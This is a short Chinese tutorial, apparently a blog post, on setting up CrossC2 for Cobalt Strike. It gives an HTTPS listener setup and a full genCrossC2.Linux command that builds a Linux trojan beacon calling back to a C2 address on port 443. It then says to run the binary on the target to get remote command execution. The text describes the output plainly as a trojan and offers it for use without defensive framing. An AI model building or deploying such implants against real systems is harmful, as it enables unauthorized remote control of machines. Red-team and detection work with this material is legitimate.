下载和配置crossC2
首先到项目地址:https://github.com/gloxec/CrossC2/releases下载两个文件
.cna是CS的插件,直接使用CS导入即可
创建HTTPS监听器
似乎Linux的shell目前只支持https
,所以创建HTTPS监听器
生成Linux终端的shell木马
第一种
./genCrossC2.Linux 192.168.111.128 443 .cobaltstrike.beacon_keys null Linux x64 /tmp/agonytest
参数解释:
-
genCrossC2.Linux
#GitHub上下载的文件 -
.cobaltstrike.beacon_keys
#CS目录中的隐藏文件,注意是隐藏文件用ls -a
命令可查看。 -
/tmp/agonytest
# 木马生成目录 agonytest就是木马的名称
第二种
直接用crossc2直接生成,但是由于版本的多样性,这种方法并不一定会成功。建议采用第一步!
效果
到你指定的目录去执行木马,记得给执行权限:
成功上线,可以正常执行命令: